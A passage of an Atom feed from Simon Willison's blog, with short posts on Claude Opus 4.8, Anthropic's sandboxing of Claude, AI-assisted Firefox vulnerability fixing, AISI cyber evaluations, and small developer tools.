    &lt;figcaption style="text-align: center;"&gt;max: &lt;a href="https://www.llm-prices.com/#it=25&amp;amp;ot=14430&amp;amp;sel=claude-fable-5"&gt;14,430 out, 72.175c&lt;/a&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
&lt;/div&gt;

&lt;p&gt;It's interesting that high ended up using fewer tokens than medium for this particular run.&lt;/p&gt;

&lt;p&gt;Here are the &lt;a href="https://simonwillison.net/2026/May/28/claude-opus-4-8/#and-some-pelicans"&gt;Opus 4.8 pelicans&lt;/a&gt; for comparison.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-pricing"&gt;llm-pricing&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle"&gt;pelican-riding-a-bicycle&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-mythos"&gt;claude-mythos&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="llm-pricing"/><category term="pelican-riding-a-bicycle"/><category term="llm-release"/><category term="claude-mythos"/></entry><entry><title>Pasted File Editor</title><link href="https://simonwillison.net/2026/Jun/2/pasted-file-editor/#atom-tag" rel="alternate"/><published>2026-06-02T04:13:36+00:00</published><updated>2026-06-02T04:13:36+00:00</updated><id>https://simonwillison.net/2026/Jun/2/pasted-file-editor/#atom-tag</id><summary type="html">
    
        &lt;p&gt;&lt;strong&gt;Tool:&lt;/strong&gt; &lt;a href="https://tools.simonwillison.net/pasted-file-editor"&gt;Pasted File Editor&lt;/a&gt;&lt;/p&gt;
        &lt;p&gt;I really like how you can paste a large volume of text into &lt;a href="https://claude.ail/"&gt;claude.ai&lt;/a&gt; (or the Claude desktop/mobile apps) and it will detect it as a large paste and turn it into a file attachment instead.&lt;/p&gt;
&lt;p&gt;I decided to have Codex desktop &lt;a href="https://gist.github.com/simonw/74c79119b487a5acce18b4dcc26b9f79"&gt;build me a version of that&lt;/a&gt; as a prototype.&lt;/p&gt;
&lt;p&gt;You can also open files directly - including images which will be shown as thumbnails - or drag files onto the textarea.&lt;/p&gt;
    
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/tools"&gt;tools&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/codex"&gt;codex&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="javascript"/><category term="tools"/><category term="ai-assisted-programming"/><category term="claude"/><category term="codex"/></entry><entry><title>How we contain Claude across products</title><link href="https://simonwillison.net/2026/May/30/how-we-contain-claude/#atom-tag" rel="alternate"/><published>2026-05-30T21:36:24+00:00</published><updated>2026-05-30T21:36:24+00:00</updated><id>https://simonwillison.net/2026/May/30/how-we-contain-claude/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.anthropic.com/engineering/how-we-contain-claude"&gt;How we contain Claude across products&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
A complaint I often have about sandboxing products is that they are rarely thoroughly &lt;em&gt;documented&lt;/em&gt;, and in the absence of detailed documentation it's hard to know how much I can trust them.&lt;/p&gt;
&lt;p&gt;Anthropic just published a fantastic overview of how their various sandbox techniques work across &lt;a href="https://claude.ai/"&gt;Claude.ai&lt;/a&gt;, Claude Code, and Cowork.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We constrain where and how an agent can act with process sandboxes, VMs, filesystem boundaries, and egress controls. The goal is to set a hard boundary on what an agent can reach. For example, if credentials never enter the sandbox, they can't be exfiltrated, regardless of whether the cause is a user, a model finding a “creative” path, or an attacker.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Claude.ai uses gVisor. Claude Code, run locally, uses Seatbelt on macOS and Bubblewrap on Linux. Claude Cowork runs a full VM (Apple's Virtualization framework on macOS, HCS on Windows).&lt;/p&gt;
&lt;p&gt;There's a lot in here, including some interesting stories of risks they missed such as the &lt;code&gt;api.anthropic.com/v1/files&lt;/code&gt; exfiltration vector &lt;a href="https://simonwillison.net/2026/Jan/14/claude-cowork-exfiltrates-files/"&gt;covered here previously&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This reminded me it's time I took another look at Anthropic's open source &lt;a href="https://github.com/anthropic-experimental/sandbox-runtime"&gt;srt (Anthropic Sandbox Runtime)&lt;/a&gt; tool - it's mature enough now that I'm ready to give it a proper go.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/sandboxing"&gt;sandboxing&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-code"&gt;claude-code&lt;/a&gt;&lt;/p&gt;



</summary><category term="sandboxing"/><category term="security"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="claude-code"/></entry><entry><title>Claude Opus 4.8: "a modest but tangible improvement"</title><link href="https://simonwillison.net/2026/May/28/claude-opus-4-8/#atom-tag" rel="alternate"/><published>2026-05-28T23:59:50+00:00</published><updated>2026-05-28T23:59:50+00:00</updated><id>https://simonwillison.net/2026/May/28/claude-opus-4-8/#atom-tag</id><summary type="html">
    &lt;p&gt;Anthropic shipped &lt;a href="https://www.anthropic.com/news/claude-opus-4-8"&gt;Claude Opus 4.8&lt;/a&gt; today. My favourite thing about it is this note in the release announcement:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Users will find Opus 4.8 to be a modest but tangible improvement on its predecessor. There’s still more to be done: we’re working on developing and releasing models that provide many of the same capabilities as Opus at a lower cost.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It's so refreshing to see an AI lab honestly describe a release as a minor incremental improvement over the previous model!&lt;/p&gt;
&lt;p&gt;Honesty seems to be a theme. Here's my other favorite note from that announcement:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;One of the most prominent improvements in Opus 4.8 is its &lt;em&gt;honesty&lt;/em&gt;. We train all our models to be honest---for instance, to avoid making claims that they can't support. But a general problem with AI models is that they sometimes jump to conclusions, confidently claiming to have made progress in their work despite the evidence being thin. Early testers report that Opus 4.8 is more likely to flag uncertainties about its work and less likely to make unsupported claims. This is borne out in &lt;a href="https://www.anthropic.com/claude-opus-4-8-system-card"&gt;our evaluations&lt;/a&gt;, which show that Opus 4.8 is around four times less likely than its predecessor to allow flaws in code it has written to pass unremarked.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That linked system card includes the following:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Claude Opus 4.8 had the lowest incorrect-rate of the six models on every benchmark—the most direct measure of factual hallucination. It achieved this mainly by abstaining on questions about which it was uncertain rather than by answering more questions correctly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h4 id="model-characteristics"&gt;Model characteristics&lt;/h4&gt;
&lt;p&gt;Not much has changed since 4.7.&lt;/p&gt;
&lt;p&gt;It's priced the same as Opus 4.5/4.6/4.7 - $5/million input and $25 per million output. "Fast mode" is twice that price, which is a significant reduction from their previous models - fast mode on 4.6/4.7 remains at $30/$150. Note that &lt;a href="https://platform.claude.com/docs/en/build-with-claude/fast-mode"&gt;fast mode&lt;/a&gt; is only available to organizations that are part of the research preview, "Contact your account manager to request access".&lt;/p&gt;
&lt;p&gt;Both the reliable knowledge cutoff and the training data cutoff are January 2026, the same as for 4.7.&lt;/p&gt;
&lt;p&gt;The context window is still 1,000,000 tokens, and the max output is 128,000 tokens.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://platform.claude.com/docs/en/about-claude/models/whats-new-claude-4-8"&gt;What's new in Claude Opus 4.8&lt;/a&gt; document has some of the more interesting details. These caught my eye:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Mid-conversation system messages&lt;/strong&gt;. Claude Opus 4.8 accepts &lt;code&gt;role: "system"&lt;/code&gt; messages immediately after a user turn in the &lt;code&gt;messages&lt;/code&gt; array (subject to &lt;a href="https://platform.claude.com/docs/en/build-with-claude/mid-conversation-system-messages#limitations"&gt;placement rules&lt;/a&gt;). This lets you append updated instructions later in a long-running conversation without restating the full system prompt, which preserves &lt;a href="https://platform.claude.com/docs/en/build-with-claude/prompt-caching"&gt;prompt cache&lt;/a&gt; hits on the earlier turns and reduces input cost on agentic loops.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;See also &lt;a href="https://github.com/anthropics/anthropic-sdk-python/commit/2b826760101664ef89db42132932f53ba97c894d#diff-a947c9c02eab58e8ddbe799a11832d533836d242e07c7251997f8543f0981f2f"&gt;this update&lt;/a&gt; to the Anthropic Python SDK. Being able to steer the system prompt mid-conversation sounds really powerful. I was worried this would be incompatible with the abstraction provided by my own &lt;a href="https://llm.datasette.io/en/stable/python-api.html#system-prompts"&gt;LLM library&lt;/a&gt;, which expects a single system prompt per conversation... but it turns out my recent &lt;a href="https://simonwillison.net/2026/Apr/29/llm/"&gt;redesign&lt;/a&gt; should handle that &lt;a href="https://github.com/simonw/llm-anthropic/issues/73"&gt;just fine&lt;/a&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Lower prompt cache minimum&lt;/strong&gt;. The minimum cacheable prompt length on Claude Opus 4.8 is 1,024 tokens, lower than on Claude Opus 4.7.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I checked and 4.7's minimum &lt;a href="https://platform.claude.com/docs/en/build-with-claude/prompt-caching#cache-limitations"&gt;was 4,096&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="and-some-pelicans"&gt;And some pelicans&lt;/h4&gt;
&lt;p&gt;Here are &lt;a href="https://tools.simonwillison.net/markdown-svg-renderer#url=https%3A%2F%2Fgist.github.com%2Fsimonw%2Ffea4f7546626d627862dc241a4e3a86a"&gt;pelicans riding bicycles&lt;/a&gt; for all five thinking levels, &lt;code&gt;low&lt;/code&gt;, &lt;code&gt;medium&lt;/code&gt;, &lt;code&gt;high&lt;/code&gt;, &lt;code&gt;xhigh&lt;/code&gt;, and &lt;code&gt;max&lt;/code&gt;:&lt;/p&gt;

&lt;div style="display: grid; grid-template-columns: repeat(6, 1fr); gap: 1rem; max-width: 900px; margin: 0 auto;"&gt;
    &lt;figure style="grid-column: span 2; margin: 0; text-align: center;"&gt;
        &lt;img src="https://static.simonwillison.net/static/2026/claude-opus-4.8-low.png" alt="Flat-style cartoon illustration of a white duck with an orange beak and legs riding a black bicycle, its feet on the pedals, against a blue sky and green grass background." style="width: 100%; height: auto; border: 1px solid #ccc;" /&gt;
        &lt;figcaption style="margin-top: 0.5rem; font-family: system-ui, sans-serif; font-weight: bold;"&gt;
            &lt;a href="https://gist.github.com/simonw/fea4f7546626d627862dc241a4e3a86a#response"&gt;low&lt;/a&gt;
        &lt;/figcaption&gt;
    &lt;/figure&gt;
    &lt;figure style="grid-column: span 2; margin: 0; text-align: center;"&gt;
        &lt;img src="https://static.simonwillison.net/static/2026/claude-opus-4.8-medium.png" alt="Flat-style illustration of a white egret or heron with an orange beak and legs riding a black bicycle, against a blue sky and green grass background." style="width: 100%; height: auto; border: 1px solid #ccc;" /&gt;
        &lt;figcaption style="margin-top: 0.5rem; font-family: system-ui, sans-serif; font-weight: bold;"&gt;
            &lt;a href="https://gist.github.com/simonw/fea4f7546626d627862dc241a4e3a86a#response-1"&gt;medium&lt;/a&gt;
        &lt;/figcaption&gt;
    &lt;/figure&gt;
    &lt;figure style="grid-column: span 2; margin: 0; text-align: center;"&gt;
        &lt;img src="https://static.simonwillison.net/static/2026/claude-opus-4.8-high.png" alt="Cartoon illustration of a white duck with an orange beak riding a black bicycle, against a light blue sky with a pale yellow sun in the upper left and a green ground line at the bottom." style="width: 100%; height: auto; border: 1px solid #ccc;" /&gt;
        &lt;figcaption style="margin-top: 0.5rem; font-family: system-ui, sans-serif; font-weight: bold;"&gt;
            &lt;a href="https://gist.github.com/simonw/fea4f7546626d627862dc241a4e3a86a#response-2"&gt;high&lt;/a&gt;
        &lt;/figcaption&gt;
    &lt;/figure&gt;
    &lt;figure style="grid-column: span 3; margin: 0; text-align: center;"&gt;
        &lt;img src="https://static.simonwillison.net/static/2026/claude-opus-4.8-xhigh.png" alt="Cartoon illustration of a white pelican with an orange beak riding a black bicycle, its orange legs extending down to the pedals, against a blue sky with a yellow sun and green ground." style="width: 100%; height: auto; border: 1px solid #ccc;" /&gt;
        &lt;figcaption style="margin-top: 0.5rem; font-family: system-ui, sans-serif; font-weight: bold;"&gt;
            &lt;a href="https://gist.github.com/simonw/fea4f7546626d627862dc241a4e3a86a#response-3"&gt;xhigh&lt;/a&gt;
        &lt;/figcaption&gt;
    &lt;/figure&gt;
    &lt;figure style="grid-column: span 3; margin: 0; text-align: center;"&gt;
        &lt;img src="https://static.simonwillison.net/static/2026/claude-opus-4.8-max.png" alt="Cartoon illustration of a white pelican with an orange beak riding a red bicycle on green grass, against a light blue sky with a fluffy white cloud and a yellow sun." style="width: 100%; height: auto; border: 1px solid #ccc;" /&gt;
        &lt;figcaption style="margin-top: 0.5rem; font-family: system-ui, sans-serif; font-weight: bold;"&gt;&lt;a href="https://gist.github.com/simonw/fea4f7546626d627862dc241a4e3a86a#response-4"&gt;max&lt;/a&gt;&lt;/figcaption&gt;
    &lt;/figure&gt;
&lt;/div&gt;


&lt;p&gt;This time I ran them using the &lt;a href="https://llm.datasette.io/en/stable/usage.html"&gt;LLM CLI&lt;/a&gt;, exported the logs to Markdown and then had Claude Opus 4.8 &lt;a href="https://github.com/simonw/tools/commit/71e4944766b577a327ff048cc63b739ba4cbade9"&gt;build me&lt;/a&gt; an HTML tool that could render that Markdown with the &lt;code&gt;svg&lt;/code&gt; fenced code blocks displayed as SVGs on the page.&lt;/p&gt;

&lt;p&gt;(I later had GPT-5.5 xhigh in Codex &lt;a href="https://gist.github.com/simonw/bb5a267f8144dfe4e92e50a014e49e98"&gt;update that code&lt;/a&gt; to remove any XSS holes. I'm sure Claude could have done that if I'd asked, but GPT-5.5 is my code security blanket at the moment.)&lt;/p&gt;

&lt;p&gt;The max one  was clearly the best, but it did take 25 input, 17,167 output tokens for a total cost of &lt;a href="https://www.llm-prices.com/#it=25&amp;amp;ot=17167&amp;amp;ic=5&amp;amp;oc=25&amp;amp;sel=claude-opus-4-5"&gt;43 cents&lt;/a&gt;!&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle"&gt;pelican-riding-a-bicycle&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="pelican-riding-a-bicycle"/><category term="llm-release"/></entry><entry><title>Behind the Scenes Hardening Firefox with Claude Mythos Preview</title><link href="https://simonwillison.net/2026/May/7/firefox-claude-mythos/#atom-tag" rel="alternate"/><published>2026-05-07T17:56:25+00:00</published><updated>2026-05-07T17:56:25+00:00</updated><id>https://simonwillison.net/2026/May/7/firefox-claude-mythos/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://hacks.mozilla.org/2026/05/behind-the-scenes-hardening-firefox/"&gt;Behind the Scenes Hardening Firefox with Claude Mythos Preview&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Fascinating, in-depth details on how Mozilla used their access to the Claude Mythos preview to locate and then fix hundreds of vulnerabilities in Firefox:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Suddenly, the bugs are very good&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Just a few months ago, AI-generated security bug reports to open source projects were mostly known for being unwanted slop. Dealing with reports that look plausibly correct but are wrong imposes an asymmetric cost on project maintainers: it’s cheap and easy to prompt an LLM to find a “problem” in code, but slow and expensive to respond to it.&lt;/p&gt;
&lt;p&gt;It is difficult to overstate how much this dynamic changed for us over a few short months. This was due to a combination of two main factors. First, the models got a lot more capable. Second, we dramatically improved our techniques for &lt;em&gt;harnessing&lt;/em&gt; these models — steering them, scaling them, and stacking them to generate large amounts of signal and filter out the noise.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;They include some detailed bug descriptions too, including a 20-year old XSLT bug and a 15-year-old bug in the &lt;code&gt;&amp;lt;legend&amp;gt;&lt;/code&gt; element.&lt;/p&gt;
&lt;p&gt;A lot of the attempts made by the harness were blocked by Firefox's existing defense-in-depth measures, which is reassuring.&lt;/p&gt;
&lt;p&gt;Mozilla were fixing around 20-30 security bugs in Firefox per month through 2025. That jumped to 423 in April.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Bar chart titled &amp;quot;Firefox Security Bug Fixes by Month&amp;quot; with subtitle &amp;quot;All Sources • All Severities&amp;quot; on a dark purple background, showing monthly counts: Jan 2025: 21, Feb 2025: 20, Mar 2025: 26, Apr 2025: 31, May 2025: 17, Jun 2025: 21, Jul 2025: 22, Aug 2025: 17, Sep 2025: 18, Oct 2025: 26, Nov 2025: 19, Dec 2025: 20, Jan 2026: 25, Feb 2026: 61, Mar 2026: 76, Apr 2026: 423 — a dramatic spike in the final month." src="https://static.simonwillison.net/static/2026/firefox-security.webp" /&gt;

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://lobste.rs/s/7zppv1/behind_scenes_hardening_firefox_with"&gt;Lobste.rs&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/firefox"&gt;firefox&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/mozilla"&gt;mozilla&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-mythos"&gt;claude-mythos&lt;/a&gt;&lt;/p&gt;



</summary><category term="firefox"/><category term="mozilla"/><category term="security"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="ai-security-research"/><category term="claude-mythos"/></entry><entry><title>Live blog: Code w/ Claude 2026</title><link href="https://simonwillison.net/2026/May/6/code-w-claude-2026/#atom-tag" rel="alternate"/><published>2026-05-06T15:58:27+00:00</published><updated>2026-05-06T15:58:27+00:00</updated><id>https://simonwillison.net/2026/May/6/code-w-claude-2026/#atom-tag</id><summary type="html">
    &lt;p&gt;I'm at Anthropic's Code w/ Claude event today. Here's my live blog of the morning keynote sessions.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-code"&gt;claude-code&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/live-blog"&gt;live-blog&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="claude-code"/><category term="live-blog"/></entry><entry><title>Quoting Anthropic</title><link href="https://simonwillison.net/2026/May/3/anthropic/#atom-tag" rel="alternate"/><published>2026-05-03T15:13:23+00:00</published><updated>2026-05-03T15:13:23+00:00</updated><id>https://simonwillison.net/2026/May/3/anthropic/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://www.anthropic.com/research/claude-personal-guidance"&gt;&lt;p&gt;We used an automatic classifier which judged sycophancy by looking at whether Claude showed a willingness to push back, maintain positions when challenged, give praise proportional to the merit of ideas, and speak frankly regardless of what a person wants to hear. Most of the time in these situations, Claude expressed no sycophancy—only 9% of conversations included sycophantic behavior (Figure 2). But two domains were exceptions: we saw sycophantic behavior in 38% of conversations focused on spirituality, and 25% of conversations on relationships.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://www.anthropic.com/research/claude-personal-guidance"&gt;Anthropic&lt;/a&gt;, How people ask Claude for personal guidance&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-personality"&gt;ai-personality&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sycophancy"&gt;sycophancy&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="ai-ethics"/><category term="ai-personality"/><category term="sycophancy"/></entry><entry><title>Our evaluation of OpenAI's GPT-5.5 cyber capabilities</title><link href="https://simonwillison.net/2026/Apr/30/gpt-55-cyber-capabilities/#atom-tag" rel="alternate"/><published>2026-04-30T23:03:24+00:00</published><updated>2026-04-30T23:03:24+00:00</updated><id>https://simonwillison.net/2026/Apr/30/gpt-55-cyber-capabilities/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.aisi.gov.uk/blog/our-evaluation-of-openais-gpt-5-5-cyber-capabilities"&gt;Our evaluation of OpenAI&amp;#x27;s GPT-5.5 cyber capabilities&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
The UK's AI Security Institute &lt;a href="https://www.aisi.gov.uk/blog/our-evaluation-of-claude-mythos-previews-cyber-capabilities"&gt;previously evaluated Claude Mythos&lt;/a&gt;: now they've evaluated GPT-5.5 for finding security vulnerability and found it to be comparable to Mythos, but unlike Mythos it's generally available right now.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openai"&gt;openai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/gpt"&gt;gpt&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai"/><category term="openai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="ai-security-research"/><category term="gpt"/></entry><entry><title>Quoting Bobby Holley</title><link href="https://simonwillison.net/2026/Apr/22/bobby-holley/#atom-tag" rel="alternate"/><published>2026-04-22T05:40:56+00:00</published><updated>2026-04-22T05:40:56+00:00</updated><id>https://simonwillison.net/2026/Apr/22/bobby-holley/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://blog.mozilla.org/en/privacy-security/ai-security-zero-day-vulnerabilities/"&gt;&lt;p&gt;As part of our continued collaboration with Anthropic, we had the opportunity to apply an early version of Claude Mythos Preview to Firefox. This week’s release of Firefox 150 includes fixes for &lt;a href="https://www.mozilla.org/en-US/security/advisories/mfsa2026-30/"&gt;271 vulnerabilities&lt;/a&gt; identified during this initial evaluation. [...]&lt;/p&gt;
&lt;p&gt;Our experience is a hopeful one for teams who shake off the vertigo and get to work. You may need to reprioritize everything else to bring relentless and single-minded focus to the task, but there is light at the end of the tunnel. We are extremely proud of how our team rose to meet this challenge, and others will too. Our work isn’t finished, but we’ve turned the corner and can glimpse a future much better than just keeping up. &lt;strong&gt;Defenders finally have a chance to win, decisively&lt;/strong&gt;.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://blog.mozilla.org/en/privacy-security/ai-security-zero-day-vulnerabilities/"&gt;Bobby Holley&lt;/a&gt;, CTO, Firefox&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/firefox"&gt;firefox&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/mozilla"&gt;mozilla&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-mythos"&gt;claude-mythos&lt;/a&gt;&lt;/p&gt;



</summary><category term="firefox"/><category term="mozilla"/><category term="security"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="ai-security-research"/><category term="claude-mythos"/></entry><entry><title>Claude Token Counter, now with model comparisons</title><link href="https://simonwillison.net/2026/Apr/20/claude-token-counts/#atom-tag" rel="alternate"/><published>2026-04-20T00:50:45+00:00</published><updated>2026-04-20T00:50:45+00:00</updated><id>https://simonwillison.net/2026/Apr/20/claude-token-counts/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://tools.simonwillison.net/claude-token-counter"&gt;Claude Token Counter, now with model comparisons&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I &lt;a href="https://github.com/simonw/tools/pull/269"&gt;upgraded&lt;/a&gt; my Claude Token Counter tool to add the ability to run the same count against different models in order to compare them.&lt;/p&gt;
&lt;p&gt;As far as I can tell Claude Opus 4.7 is the first model to change the tokenizer, so it's only worth running comparisons between 4.7 and 4.6. The Claude &lt;a href="https://platform.claude.com/docs/en/build-with-claude/token-counting"&gt;token counting API&lt;/a&gt; accepts any Claude model ID though so I've included options for all four of the notable current models (Opus 4.7 and 4.6, Sonnet 4.6, and Haiku 4.5).&lt;/p&gt;
&lt;p&gt;In the Opus 4.7 announcement &lt;a href="https://www.anthropic.com/news/claude-opus-4-7#migrating-from-opus-46-to-opus-47"&gt;Anthropic said&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
